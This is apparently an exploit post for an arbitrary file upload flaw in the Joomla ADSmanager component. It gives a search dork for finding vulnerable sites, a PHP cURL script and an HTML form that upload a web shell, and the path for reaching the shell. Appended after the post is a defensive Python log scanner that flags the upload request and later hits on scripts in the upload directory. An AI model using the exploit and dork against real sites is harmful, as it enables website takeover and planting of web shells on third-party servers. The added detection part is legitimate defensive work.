Joomla ADSmanager Exploit Arbitrary File Upload Vulnerability
By
chmood
Dork : inurl:/index.php?option=com_adsmanager/ site:/uk/com/org
CODE PHP :
<?php
$url = "blabla.com/index.php?option=com_adsmanager&task=upload&tmpl=component"; // put URL Here
$post = array("file" => "@shell.jpg", "name" => "shell.php");
$ch = curl_init("$url");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_POST, 1);
@curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec($ch);
curl_close($ch);
echo $data;
?>

#CSRF :
<form method="POST" action="TARGET/index.php?option=com_adsmanager&task=upload&tmpl=component" enctype="multipart/form-data">
<input type="file" name="files[]" />
<button>Upload</button>
</form>
Access Shell: site.com/tmp/plupload/shell.php
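For defenders, the requests above leave two traces in a web server access log: a POST to the com_adsmanager task=upload endpoint, and a later request for a script under /tmp/plupload/. The following is an added example, not part of the original post, that flags both in combined-format logs; the sample log lines, the function names and the list of script extensions are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined format, documentation IP ranges).
SAMPLE_LOG = """\
198.51.100.7 - - [10/Oct/2015:13:55:36 +0000] "POST /index.php?option=com_adsmanager&task=upload&tmpl=component HTTP/1.1" 200 52 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2015:13:55:41 +0000] "GET /tmp/plupload/shell.php HTTP/1.1" 200 1180 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2015:14:02:10 +0000] "GET /index.php?option=com_adsmanager&view=list HTTP/1.1" 200 8431 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2015:14:03:00 +0000] "GET /tmp/plupload/photo.jpg HTTP/1.1" 200 20480 "-" "Mozilla/5.0"
192.0.2.44 - - [10/Oct/2015:14:10:00 +0000] "POST /index.php?tmpl=component&task=upload&option=com_adsmanager HTTP/1.1" 200 52 "-" "curl/7.40"
192.0.2.44 - - [10/Oct/2015:14:10:05 +0000] "GET /tmp/plupload/x.PhP HTTP/1.1" 404 210 "-" "curl/7.40"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
SCRIPT_RE = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)  # assumed extension list

def classify(method, target):
    """Return the indicator a request matches, or None."""
    parts = urlsplit(target)
    query = parse_qs(parts.query)  # parameter order does not matter
    if (method == "POST" and query.get("option") == ["com_adsmanager"]
            and query.get("task") == ["upload"]):
        return "upload-task"
    if "/tmp/plupload/" in parts.path.lower() and SCRIPT_RE.search(parts.path):
        return "script-in-upload-dir"
    return None

def scan(log_text):
    """Parse combined-format lines and keep those matching an indicator."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, ts, method, target, status = m.groups()
        kind = classify(method, target)
        if kind:
            findings.append({"ip": ip, "time": ts, "kind": kind,
                             "status": int(status), "target": target})
    return findings

def likely_compromise(findings):
    """Clients that hit the upload task and later got a 200 for a script there."""
    uploaders, hits = set(), []
    for f in findings:
        if f["kind"] == "upload-task":
            uploaders.add(f["ip"])
        elif f["status"] == 200 and f["ip"] in uploaders and f["ip"] not in hits:
            hits.append(f["ip"])
    return hits
```

A 200 response on the second request is the signal to triage first; denying script execution in the upload directory at the web server removes that step even when an upload succeeds.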